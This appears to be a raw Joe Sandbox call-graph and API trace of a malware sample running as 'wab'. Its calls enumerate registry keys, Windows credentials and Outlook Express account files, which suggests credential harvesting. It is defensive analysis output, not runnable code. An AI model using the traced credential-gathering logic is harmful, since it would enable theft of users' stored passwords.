401fef memset memset sprintf 33482->33483 33491 401fc9 33482->33491 33615 410b1e 33483->33615 33486 402165 33486->33481 33487 406f81 GetFileAttributesA 33487->33491 33488 402076 memset memset strlen strlen 33488->33491 33489 4070e3 strlen _mbscat _mbscpy _mbscat 33489->33491 33490 4020dd strlen strlen 33490->33491 33491->33481 33491->33482 33491->33486 33491->33487 33491->33488 33491->33489 33491->33490 33492 402167 _mbscpy 33491->33492 33622 410b62 RegEnumKeyExA 33491->33622 33492->33481 33494 40c422 33493->33494 33495 40c425 _mbscat _mbscpy _mbscpy 33493->33495 33494->33495 33496 40c49d 33495->33496 33497 40c512 33496->33497 33498 40c502 GetWindowPlacement 33496->33498 33499 40c538 33497->33499 33644 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33497->33644 33498->33497 33637 409b31 33499->33637 33503 40ba28 33504 40ba87 33503->33504 33510 40ba3c 33503->33510 33647 406c62 LoadCursorA SetCursor 33504->33647 33506 40ba43 _mbsicmp 33506->33510 33507 40ba8c 33648 4107f1 33507->33648 33651 403c16 33507->33651 33727 410a9c RegOpenKeyExA 33507->33727 33728 404734 33507->33728 33736 404785 33507->33736 33508 40baa0 33509 407e30 _strcmpi 33508->33509 33513 40bab0 33509->33513 33510->33504 33510->33506 33739 40b5e5 10 API calls 33510->33739 33511 40bafa SetCursor 33511->33376 33513->33511 33514 40baf1 qsort 33513->33514 33514->33511 34099 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33520->34099 33522 40b00e 33523 40b016 33522->33523 33524 40b01f GetStdHandle 33522->33524 34100 406d1a CreateFileA 33523->34100 33526 40b01c 33524->33526 33527 40b035 33526->33527 33528 40b12d 33526->33528 34101 406c62 LoadCursorA SetCursor 33527->34101 34105 406d77 9 API calls 33528->34105 33531 40b136 33542 40c580 28 API calls 33531->33542 33532 40b087 33539 40b0a1 33532->33539 34103 40a699 12 API calls 33532->34103 33533 40b042 33533->33532 33533->33539 34102 40a57c strlen WriteFile 33533->34102 33536 40b0d6 33537 40b116 CloseHandle 33536->33537 33538 40b11f SetCursor 33536->33538 33537->33538 33538->33531 33539->33536 34104 406d77 9 API calls 33539->34104 33541->33370 33542->33373 33555 409a32 33543->33555 33546 409c80 memcpy memcpy 33547 409cda 33546->33547 33547->33546 33548 409d18 ??2@YAPAXI ??2@YAPAXI 33547->33548 33552 408db6 12 API calls 33547->33552 33549 409d54 ??2@YAPAXI 33548->33549 33550 409d8b 33548->33550 33549->33550 33565 409b9c 33550->33565 33552->33547 33554 4023c1 33554->33455 33556 409a44 33555->33556 33557 409a3d ??3@YAXPAX 33555->33557 33558 409a52 33556->33558 33559 409a4b ??3@YAXPAX 33556->33559 33557->33556 33560 409a63 33558->33560 33561 409a5c ??3@YAXPAX 33558->33561 33559->33558 33562 409a83 ??2@YAPAXI ??2@YAPAXI 33560->33562 33563 409a73 ??3@YAXPAX 33560->33563 33564 409a7c ??3@YAXPAX 33560->33564 33561->33560 33562->33546 33563->33564 33564->33562 33566 407a55 ??3@YAXPAX 33565->33566 33567 409ba5 33566->33567 33568 407a55 ??3@YAXPAX 33567->33568 33569 409bad 33568->33569 33570 407a55 ??3@YAXPAX 33569->33570 33571 409bb5 33570->33571 33572 407a55 ??3@YAXPAX 33571->33572 33573 409bbd 33572->33573 33574 407a1f 4 API calls 33573->33574 33575 409bd0 33574->33575 33576 407a1f 4 API calls 33575->33576 33577 409bda 33576->33577 33578 407a1f 4 API calls 33577->33578 33579 409be4 33578->33579 33580 407a1f 4 API calls 33579->33580 33581 409bee 33580->33581 33581->33554 33583 410d0e 2 API calls 33582->33583 33584 410dca 33583->33584 33585 410dfd memset 33584->33585 33624 4070ae 33584->33624 33586 410e1d 33585->33586 33627 410a9c RegOpenKeyExA 33586->33627 33590 401e9e strlen strlen 33590->33458 33590->33459 33591 410e4a 33592 410e7f _mbscpy 33591->33592 33628 410d3d _mbscpy 33591->33628 33592->33590 33594 410e5b 33629 410add RegQueryValueExA 33594->33629 33596 410e73 RegCloseKey 33596->33592 33597->33462 33598->33468 33630 410a9c RegOpenKeyExA 33599->33630 33601 401c4c 33602 401cad 33601->33602 33631 410add RegQueryValueExA 33601->33631 33602->33471 33602->33473 33604 401c6a 33605 401c71 strchr 33604->33605 33606 401ca4 RegCloseKey 33604->33606 33605->33606 33607 401c85 strchr 33605->33607 33606->33602 33607->33606 33608 401c94 33607->33608 33632 406f06 strlen 33608->33632 33610 401ca1 33610->33606 33611->33474 33612->33459 33613->33465 33614->33491 33635 410a9c RegOpenKeyExA 33615->33635 33617 410b34 33618 410b5d 33617->33618 33636 410add RegQueryValueExA 33617->33636 33618->33491 33620 410b4c RegCloseKey 33620->33618 33622->33491 33623->33479 33625 4070bd GetVersionExA 33624->33625 33626 4070ce 33624->33626 33625->33626 33626->33585 33626->33590 33627->33591 33628->33594 33629->33596 33630->33601 33631->33604 33633 406f17 33632->33633 33634 406f1a memcpy 33632->33634 33633->33634 33634->33610 33635->33617 33636->33620 33638 409b40 33637->33638 33640 409b4e 33637->33640 33645 409901 memset SendMessageA 33638->33645 33641 409b99 33640->33641 33642 409b8b 33640->33642 33641->33503 33646 409868 SendMessageA 33642->33646 33644->33499 33645->33640 33646->33641 33647->33507 33649 410807 33648->33649 33650 4107fc FreeLibrary 33648->33650 33649->33508 33650->33649 33652 4107f1 FreeLibrary 33651->33652 33653 403c30 LoadLibraryA 33652->33653 33654 403c74 33653->33654 33655 403c44 GetProcAddress 33653->33655 33656 4107f1 FreeLibrary 33654->33656 33655->33654 33657 403c5e 33655->33657 33658 403c7b 33656->33658 33657->33654 33661 403c6b 33657->33661 33659 404734 3 API calls 33658->33659 33660 403c86 33659->33660 33740 4036e5 33660->33740 33661->33658 33664 4036e5 26 API calls 33665 403c9a 33664->33665 33666 4036e5 26 API calls 33665->33666 33667 403ca4 33666->33667 33668 4036e5 26 API calls 33667->33668 33669 403cae 33668->33669 33752 4085d2 33669->33752 33677 403ce5 33678 403cf7 33677->33678 33935 402bd1 39 API calls 33677->33935 33798 410a9c RegOpenKeyExA 33678->33798 33681 403d0a 33682 403d1c 33681->33682 33936 402bd1 39 API calls 33681->33936 33799 402c5d 33682->33799 33686 4070ae GetVersionExA 33687 403d31 33686->33687 33817 410a9c RegOpenKeyExA 33687->33817 33689 403d51 33690 403d61 33689->33690 33937 402b22 46 API calls 33689->33937 33818 410a9c RegOpenKeyExA 33690->33818 33693 403d87 33694 403d97 33693->33694 33938 402b22 46 API calls 33693->33938 33819 410a9c RegOpenKeyExA 33694->33819 33697 403dbd 33698 403dcd 33697->33698 33939 402b22 46 API calls 33697->33939 33820 410808 33698->33820 33702 404785 FreeLibrary 33703 403de8 33702->33703 33824 402fdb 33703->33824 33706 402fdb 34 API calls 33707 403e00 33706->33707 33840 4032b7 33707->33840 33716 403e3b 33718 403e73 33716->33718 33719 403e46 _mbscpy 33716->33719 33887 40fb00 33718->33887 33941 40f334 334 API calls 33719->33941 33727->33508 33729 404785 FreeLibrary 33728->33729 33730 40473b LoadLibraryA 33729->33730 33731 40474c GetProcAddress 33730->33731 33734 40476e 33730->33734 33732 404764 33731->33732 33731->33734 33732->33734 33733 404781 33733->33508 33734->33733 33735 404785 FreeLibrary 33734->33735 33735->33733 33737 4047a3 33736->33737 33738 404799 FreeLibrary 33736->33738 33737->33508 33738->33737 33739->33510 33741 4037c5 33740->33741 33742 4036fb 33740->33742 33741->33664 33942 410863 UuidFromStringA UuidFromStringA memcpy 33742->33942 33744 40370e 33744->33741 33745 403716 strchr 33744->33745 33745->33741 33746 403730 33745->33746 33943 4021b6 memset 33746->33943 33748 40373f _mbscpy _mbscpy strlen 33749 4037a4 _mbscpy 33748->33749 33750 403789 sprintf 33748->33750 33944 4023e5 16 API calls 33749->33944 33750->33749 33753 4085e2 33752->33753 33945 4082cd 11 API calls 33753->33945 33757 408600 33758 403cba 33757->33758 33759 40860b memset 33757->33759 33770 40821d 33758->33770 33948 410b62 RegEnumKeyExA 33759->33948 33761 4086d2 RegCloseKey 33761->33758 33763 408637 33763->33761 33764 40865c memset 33763->33764 33949 410a9c RegOpenKeyExA 33763->33949 33952 410b62 RegEnumKeyExA 33763->33952 33950 410add RegQueryValueExA 33764->33950 33767 408694 33951 40848b 10 API calls 33767->33951 33769 4086ab RegCloseKey 33769->33763 33953 410a9c RegOpenKeyExA 33770->33953 33772 40823f 33773 403cc6 33772->33773 33774 408246 memset 33772->33774 33782 4086e0 33773->33782 33954 410b62 RegEnumKeyExA 33774->33954 33776 4082bf RegCloseKey 33776->33773 33778 40826f 33778->33776 33955 410a9c RegOpenKeyExA 33778->33955 33956 4080ed 11 API calls 33778->33956 33957 410b62 RegEnumKeyExA 33778->33957 33781 4082a2 RegCloseKey 33781->33778 33958 4045db 33782->33958 33784 4088ef 33966 404656 33784->33966 33788 408737 wcslen 33788->33784 33794 40876a 33788->33794 33789 40877a _wcsncoll 33789->33794 33791 404734 3 API calls 33791->33794 33792 404785 FreeLibrary 33792->33794 33793 408812 memset 33793->33794 33795 40883c memcpy wcschr 33793->33795 33794->33784 33794->33789 33794->33791 33794->33792 33794->33793 33794->33795 33796 4088c3 LocalFree 33794->33796 33969 40466b _mbscpy 33794->33969 33795->33794 33796->33794 33797 410a9c RegOpenKeyExA 33797->33677 33798->33681 33970 410a9c RegOpenKeyExA 33799->33970 33801 402c7a 33802 402da5 33801->33802 33803 402c87 memset 33801->33803 33802->33686 33971 410b62 RegEnumKeyExA 33803->33971 33805 402d9c RegCloseKey 33805->33802 33806 402cb2 33806->33805 33807 410b1e 3 API calls 33806->33807 33816 402d9a 33806->33816 33975 402bd1 39 API calls 33806->33975 33976 410b62 RegEnumKeyExA 33806->33976 33808 402ce4 memset sprintf 33807->33808 33972 410a9c RegOpenKeyExA 33808->33972 33810 402d28 33811 402d3a sprintf 33810->33811 33973 402bd1 39 API calls 33810->33973 33974 410a9c RegOpenKeyExA 33811->33974 33816->33805 33817->33689 33818->33693 33819->33697 33821 410816 33820->33821 33822 4107f1 FreeLibrary 33821->33822 33823 403ddd 33822->33823 33823->33702 33977 410a9c RegOpenKeyExA 33824->33977 33826 402ff9 33827 403006 memset 33826->33827 33828 40312c 33826->33828 33978 410b62 RegEnumKeyExA 33827->33978 33828->33706 33830 403122 RegCloseKey 33830->33828 33831 410b1e 3 API calls 33832 403058 memset sprintf 33831->33832 33979 410a9c RegOpenKeyExA 33832->33979 33834 4030a2 memset 33980 410b62 RegEnumKeyExA 33834->33980 33835 410b62 RegEnumKeyExA 33839 403033 33835->33839 33837 4030f9 RegCloseKey 33837->33839 33839->33830 33839->33831 33839->33834 33839->33835 33839->33837 33981 402db3 26 API calls 33839->33981 33841 4032d5 33840->33841 33842 4033a9 33840->33842 33982 4021b6 memset 33841->33982 33855 4034e4 memset memset 33842->33855 33844 4032e1 33983 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33844->33983 33846 4032ea 33847 4032f8 memset GetPrivateProfileSectionA 33846->33847 33984 4023e5 16 API calls 33846->33984 33847->33842 33852 40332f 33847->33852 33849 40339b strlen 33849->33842 33849->33852 33851 403350 strchr 33851->33852 33852->33842 33852->33849 33985 4021b6 memset 33852->33985 33986 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33852->33986 33987 4023e5 16 API calls 33852->33987 33856 410b1e 3 API calls 33855->33856 33857 40353f 33856->33857 33858 40357f 33857->33858 33859 403546 _mbscpy 33857->33859 33863 403985 33858->33863 33988 406d55 strlen _mbscat 33859->33988 33861 403565 _mbscat 33989 4033f0 19 API calls 33861->33989 33990 40466b _mbscpy 33863->33990 33867 4039aa 33869 4039ff 33867->33869 33991 40f460 memset memset 33867->33991 34012 40f6e2 33867->34012 34028 4038e8 21 API calls 33867->34028 33870 404785 FreeLibrary 33869->33870 33871 403a0b 33870->33871 33872 4037ca memset memset 33871->33872 34036 444551 memset 33872->34036 33874 4038e2 33874->33716 33940 40f334 334 API calls 33874->33940 33877 40382e 33878 406f06 2 API calls 33877->33878 33879 403843 33878->33879 33880 406f06 2 API calls 33879->33880 33881 403855 strchr 33880->33881 33882 403884 _mbscpy 33881->33882 33883 403897 strlen 33881->33883 33884 4038bf _mbscpy 33882->33884 33883->33884 33885 4038a4 sprintf 33883->33885 34048 4023e5 16 API calls 33884->34048 33885->33884 33888 44b090 33887->33888 33889 40fb10 RegOpenKeyExA 33888->33889 33890 403e7f 33889->33890 33891 40fb3b RegOpenKeyExA 33889->33891 33901 40f96c 33890->33901 33892 40fb55 RegQueryValueExA 33891->33892 33893 40fc2d RegCloseKey 33891->33893 33894 40fc23 RegCloseKey 33892->33894 33895 40fb84 33892->33895 33893->33890 33894->33893 33896 404734 3 API calls 33895->33896 33897 40fb91 33896->33897 33897->33894 33898 40fc19 LocalFree 33897->33898 33899 40fbdd memcpy memcpy 33897->33899 33898->33894 34053 40f802 11 API calls 33899->34053 33902 4070ae GetVersionExA 33901->33902 33903 40f98d 33902->33903 33904 4045db 7 API calls 33903->33904 33905 40f9a9 33904->33905 33906 40fae6 33905->33906 33907 40f9bf CredEnumerateW 33905->33907 33914 40f9d1 33905->33914 33908 404656 FreeLibrary 33906->33908 33907->33914 33909 403e85 33908->33909 33915 4442ea memset 33909->33915 33910 40fa13 memset WideCharToMultiByte 33911 40fa43 _strnicmp 33910->33911 33910->33914 33912 40fa5b WideCharToMultiByte 33911->33912 33911->33914 33913 40fa88 WideCharToMultiByte 33912->33913 33912->33914 33913->33914 33914->33906 33914->33910 33916 410dbb 9 API calls 33915->33916 33917 444329 33916->33917 34054 40759e strlen strlen 33917->34054 33922 410dbb 9 API calls 33923 444350 33922->33923 33924 40759e 3 API calls 33923->33924 33925 44435a 33924->33925 33926 444212 65 API calls 33925->33926 33927 444366 memset memset 33926->33927 33928 410b1e 3 API calls 33927->33928 33929 4443b9 ExpandEnvironmentStringsA strlen 33928->33929 33930 4443f4 _strcmpi 33929->33930 33931 4443e5 33929->33931 33932 403e91 33930->33932 33933 44440c 33930->33933 33931->33930 33932->33508 33934 444212 65 API calls 33933->33934 33934->33932 33935->33678 33936->33682 33937->33690 33938->33694 33939->33698 33940->33716 33941->33718 33942->33744 33943->33748 33944->33741 33946 40841c 33945->33946 33947 410a9c RegOpenKeyExA 33946->33947 33947->33757 33948->33763 33949->33763 33950->33767 33951->33769 33952->33763 33953->33772 33954->33778 33955->33778 33956->33781 33957->33778 33959 404656 FreeLibrary 33958->33959 33960 4045e3 LoadLibraryA 33959->33960 33961 404651 33960->33961 33962 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33960->33962 33961->33784 33961->33788 33963 40463d 33962->33963 33964 404643 33963->33964 33965 404656 FreeLibrary 33963->33965 33964->33961 33965->33961 33967 403cd2 33966->33967 33968 40465c FreeLibrary 33966->33968 33967->33797 33968->33967 33969->33794 33970->33801 33971->33806 33972->33810 33973->33811 33974->33806 33975->33806 33976->33806 33977->33826 33978->33839 33979->33839 33980->33839 33981->33839 33982->33844 33983->33846 33984->33847 33985->33851 33986->33852 33987->33852 33988->33861 33989->33858 33990->33867 34029 4078ba 33991->34029 33994 4078ba _mbsnbcat 33995 40f5a3 RegOpenKeyExA 33994->33995 33996 40f5c3 RegQueryValueExA 33995->33996 33997 40f6d9 33995->33997 33998 40f6d0 RegCloseKey 33996->33998 33999 40f5f0 33996->33999 33997->33867 33998->33997 33999->33998 34000 40f675 33999->34000 34033 40466b _mbscpy 33999->34033 34000->33998 34034 4012ee strlen 34000->34034 34002 40f611 34004 404734 3 API calls 34002->34004 34009 40f616 34004->34009 34005 40f69e RegQueryValueExA 34005->33998 34006 40f6c1 34005->34006 34006->33998 34007 40f66a 34008 404785 FreeLibrary 34007->34008 34008->34000 34009->34007 34010 40f661 LocalFree 34009->34010 34011 40f645 memcpy 34009->34011 34010->34007 34011->34010 34035 40466b _mbscpy 34012->34035 34014 40f6fa 34015 4045db 7 API calls 34014->34015 34016 40f708 34015->34016 34017 404734 3 API calls 34016->34017 34022 40f7e2 34016->34022 34023 40f715 34017->34023 34018 404656 FreeLibrary 34019 40f7f1 34018->34019 34020 404785 FreeLibrary 34019->34020 34021 40f7fc 34020->34021 34021->33867 34022->34018 34023->34022 34024 40f797 WideCharToMultiByte 34023->34024 34025 40f7b8 strlen 34024->34025 34026 40f7d9 LocalFree 34024->34026 34025->34026 34027 40f7c8 _mbscpy 34025->34027 34026->34022 34027->34026 34028->33867 34030 4078e6 34029->34030 34031 4078c7 _mbsnbcat 34030->34031 34032 4078ea 34030->34032 34031->34030 34032->33994 34033->34002 34034->34005 34035->34014 34049 410a9c RegOpenKeyExA 34036->34049 34038 40381a 34038->33874 34047 4021b6 memset 34038->34047 34039 44458b 34039->34038 34050 410add RegQueryValueExA 34039->34050 34041 4445a4 34042 4445dc RegCloseKey 34041->34042 34051 410add RegQueryValueExA 34041->34051 34042->34038 34044 4445c1 34044->34042 34052 444879 30 API calls 34044->34052 34046 4445da 34046->34042 34047->33877 34048->33874 34049->34039 34050->34041 34051->34044 34052->34046 34053->33898 34055 4075c9 34054->34055 34056 4075bb _mbscat 34054->34056 34057 444212 34055->34057 34056->34055 34074 407e9d 34057->34074 34060 44424d 34061 444274 34060->34061 34062 444258 34060->34062 34082 407ef8 34060->34082 34063 407e9d 9 API calls 34061->34063 34095 444196 52 API calls 34062->34095 34070 4442a0 34063->34070 34065 407ef8 9 API calls 34065->34070 34066 4442ce 34092 407f90 34066->34092 34070->34065 34070->34066 34072 444212 65 API calls 34070->34072 34096 407e62 strcmp strcmp 34070->34096 34071 407f90 FindClose 34073 4442e4 34071->34073 34072->34070 34073->33922 34075 407f90 FindClose 34074->34075 34076 407eaa 34075->34076 34077 406f06 2 API calls 34076->34077 34078 407ebd strlen strlen 34077->34078 34079 407ee1 34078->34079 34080 407eea 34078->34080 34097 4070e3 strlen _mbscat _mbscpy _mbscat 34079->34097 34080->34060 34083 407f03 FindFirstFileA 34082->34083 34084 407f24 FindNextFileA 34082->34084 34087 407f3f 34083->34087 34085 407f46 strlen strlen 34084->34085 34086 407f3a 34084->34086 34089 407f7f 34085->34089 34090 407f76 34085->34090 34088 407f90 FindClose 34086->34088 34087->34085 34087->34089 34088->34087 34089->34060 34098 4070e3 strlen _mbscat _mbscpy _mbscat 34090->34098 34093 407fa3 34092->34093 34094 407f99 FindClose 34092->34094 34093->34071 34094->34093 34095->34060 34096->34070 34097->34080 34098->34089 34099->33522 34100->33526 34101->33533 34102->33532 34103->33539 34104->33536 34105->33531 34114 411853 RtlInitializeCriticalSection memset 34115 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34288 40a256 13 API calls 34290 432e5b 17 API calls 34292 43fa5a 20 API calls 34117 401060 41 API calls 34295 427260 CloseHandle memset memset 33196 410c68 FindResourceA 33197 410c81 SizeofResource 33196->33197 33199 410cae 33196->33199 33198 410c92 LoadResource 33197->33198 33197->33199 33198->33199 33200 410ca0 LockResource 33198->33200 33200->33199 34297 405e69 14 API calls 34122 433068 15 API calls __fprintf_l 34299 414a6d 18 API calls 34300 43fe6f 134 API calls 34124 424c6d 15 API calls __fprintf_l 34301 426741 19 API calls 34126 440c70 17 API calls 34127 443c71 44 API calls 34130 427c79 24 API calls 34304 416e7e memset __fprintf_l 34134 42800b 47 API calls 34135 425115 85 API calls __fprintf_l 34307 41960c 61 API calls 34136 43f40c 122 API calls __fprintf_l 34139 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34140 43f81a 20 API calls 34142 414c20 memset memset 34143 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34311 414625 18 API calls 34312 404225 modf 34313 403a26 strlen WriteFile 34315 40422a 12 API calls 34319 427632 memset memset memcpy 34320 40ca30 59 API calls 34321 404235 26 API calls 34144 42ec34 61 API calls __fprintf_l 34145 425115 76 API calls __fprintf_l 34322 425115 77 API calls __fprintf_l 34324 44223a 38 API calls 34151 43183c 112 API calls 34325 44b2c5 _onexit __dllonexit 34330 42a6d2 memcpy __allrem 34153 405cda 65 API calls 34338 43fedc 138 API calls 34339 4116e1 16 API calls __fprintf_l 34156 4244e6 19 API calls 34158 42e8e8 127 API calls __fprintf_l 34159 4118ee RtlLeaveCriticalSection 34344 43f6ec 22 API calls 34161 425115 119 API calls __fprintf_l 33186 410cf3 EnumResourceNamesA 34347 4492f0 memcpy memcpy 34349 43fafa 18 API calls 34351 4342f9 15 API calls __fprintf_l 34162 4144fd 19 API calls 34353 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34354 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34357 443a84 _mbscpy 34359 43f681 17 API calls 34165 404487 22 API calls 34361 415e8c 16 API calls __fprintf_l 34169 411893 RtlDeleteCriticalSection __fprintf_l 34170 41a492 42 API calls 34365 403e96 34 API calls 34366 410e98 memset SHGetPathFromIDList SendMessageA 34172 426741 109 API calls __fprintf_l 34173 4344a2 18 API calls 34174 4094a2 10 API calls 34369 4116a6 15 API calls __fprintf_l 34370 43f6a4 17 API calls 34371 440aa3 20 API calls 34373 427430 45 API calls 34177 4090b0 7 API calls 34178 4148b0 15 API calls 34180 4118b4 RtlEnterCriticalSection 34181 4014b7 CreateWindowExA 34182 40c8b8 19 API calls 34184 4118bf RtlTryEnterCriticalSection 34378 42434a 18 API calls __fprintf_l 34380 405f53 12 API calls 34192 43f956 59 API calls 34194 40955a 17 API calls 34195 428561 36 API calls 34196 409164 7 API calls 34384 404366 19 API calls 34388 40176c ExitProcess 34391 410777 42 API calls 34201 40dd7b 51 API calls 34202 425d7c 16 API calls __fprintf_l 34393 43f6f0 25 API calls 34394 42db01 22 API calls 34203 412905 15 API calls __fprintf_l 34395 403b04 54 API calls 34396 405f04 SetDlgItemTextA GetDlgItemTextA 34397 44b301 ??3@YAXPAX 34400 4120ea 14 API calls 3 library calls 34401 40bb0a 8 API calls 34403 413f11 strcmp 34207 434110 17 API calls __fprintf_l 34210 425115 108 API calls __fprintf_l 34404 444b11 _onexit 34212 425115 76 API calls __fprintf_l 34215 429d19 10 API calls 34407 444b1f __dllonexit 34408 409f20 _strcmpi 34217 42b927 31 API calls 34411 433f26 19 API calls __fprintf_l 34412 44b323 FreeLibrary 34413 427f25 46 API calls 34414 43ff2b 17 API calls 34415 43fb30 19 API calls 34224 414d36 16 API calls 34226 40ad38 7 API calls 34417 433b38 16 API calls __fprintf_l 34418 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 34230 426741 21 API calls 34231 40c5c3 125 API calls 34233 43fdc5 17 API calls 34419 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34236 4161cb memcpy memcpy memcpy memcpy 33201 44b3cf 33202 44b3e6 33201->33202 33204 44b454 33201->33204 33202->33204 33208 44b40e 33202->33208 33205 44b405 33205->33204 33206 44b435 VirtualProtect 33205->33206 33206->33204 33207 44b444 VirtualProtect 33206->33207 33207->33204 33209 44b413 33208->33209 33211 44b454 33209->33211 33215 44b42b 33209->33215 33212 44b41c 33212->33211 33213 44b435 VirtualProtect 33212->33213 33213->33211 33214 44b444 VirtualProtect 33213->33214 33214->33211 33216 44b431 33215->33216 33217 44b435 VirtualProtect 33216->33217 33219 44b454 33216->33219 33218 44b444 VirtualProtect 33217->33218 33217->33219 33218->33219 34424 43ffc8 18 API calls 34237 4281cc 15 API calls __fprintf_l 34426 4383cc 110 API calls __fprintf_l 34238 4275d3 41 API calls 34427 4153d3 22 API calls __fprintf_l 34239 444dd7 _XcptFilter 34432 4013de 15 API calls 34434 425115 111 API calls __fprintf_l 34435 43f7db 18 API calls 34438 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34241 4335ee 16 API calls __fprintf_l 34440 429fef 11 API calls 34242 444deb _exit _c_exit 34441 40bbf0 138 API calls 34245 425115 79 API calls __fprintf_l 34445 437ffa 22 API calls 34249 4021ff 14 API calls 34250 43f5fc 149 API calls 34446 40e381 9 API calls 34252 405983 40 API calls 34253 42b186 27 API calls __fprintf_l 34254 427d86 76 API calls 34255 403585 20 API calls 34257 42e58e 18 API calls __fprintf_l 34260 425115 75 API calls __fprintf_l 34262 401592 8 API calls 33187 410b92 33190 410a6b 33187->33190 33189 410bb2 33191 410a77 33190->33191 33192 410a89 GetPrivateProfileIntA 33190->33192 33195 410983 memset _itoa WritePrivateProfileStringA 33191->33195 33192->33189 33194 410a84 33194->33189 33195->33194 34450 434395 16 API calls 34264 441d9c memcmp 34452 43f79b 119 API calls 34265 40c599 43 API calls 34453 426741 87 API calls 34269 4401a6 21 API calls 34271 426da6 memcpy memset memset memcpy 34272 4335a5 15 API calls 34274 4299ab memset memset memcpy memset memset 34275 40b1ab 8 API calls 34458 425115 76 API calls __fprintf_l 34462 4113b2 18 API calls 2 library calls 34466 40a3b8 memset sprintf SendMessageA 33220 410bbc 33223 4109cf 33220->33223 33224 4109dc 33223->33224 33225 410a23 memset GetPrivateProfileStringA 33224->33225 33226 4109ea memset 33224->33226 33231 407646 strlen 33225->33231 33236 4075cd sprintf memcpy 33226->33236 33229 410a0c WritePrivateProfileStringA 33230 410a65 33229->33230 33232 40765a 33231->33232 33234 40765c 33231->33234 33232->33230 33233 4076a3 33233->33230 33234->33233 33237 40737c strtoul 33234->33237 33236->33229 33237->33234 34277 40b5bf memset memset _mbsicmp

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                            APIs
                                                            • memset.MSVCRT ref: 0040832F
                                                            • memset.MSVCRT ref: 00408343
                                                            • memset.MSVCRT ref: 0040835F
                                                            • memset.MSVCRT ref: 00408376
                                                            • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                            • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                            • strlen.MSVCRT ref: 004083E9
                                                            • strlen.MSVCRT ref: 004083F8
                                                            • memcpy.MSVCRT ref: 0040840A
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: memset$ByteCharMulusermeWidestrlen$ComputerUsermemcpy
                                                            • String ID: 5$H$O$b$i$}$}
                                                            • API String ID: 1832431107-3760989150
                                                            • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                            • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                            • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                            • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                            • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                            • strlen.MSVCRT ref: 00407F5C
                                                            • strlen.MSVCRT ref: 00407F64
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.1700612023.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_400000_wab.jbxd
                                                            Similarity
                                                            • API ID: FileFindstrlen$FirstNext
                                                            • String ID: ACD
                                                            • API String ID: 379999529-620537770
                                                            • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                            • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                            • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                            • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            • memset.MSVCRT ref: 00401E8B
                                                            • strlen.MSVCRT ref: 00401EA4
                                                            • strlen.MSVCRT ref: 00401EB2
                                                            • strlen.MSVCRT ref: 00401EF8
                                                            • strlen.MSVCRT ref: 00401F06
                                                            • memset.MSVCRT ref: 00401FB1
                                                            • atoi.MSVCRT ref: 00401FE0
                                                            • memset.MSVCRT ref: 00402003
                                                            • sprintf.MSVCRT ref: 00402030
                                                              • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                                            • memset.MSVCRT ref: 00402086
                                                            • memset.MSVCRT ref: 0040209B
                                                            • strlen.MSVCRT ref: 004020A1
                                                            • strlen.MSVCRT ref: 004020AF
                                                            • strlen.MSVCRT ref: 004020E2
                                                            • strlen.MSVCRT ref: 004020F0
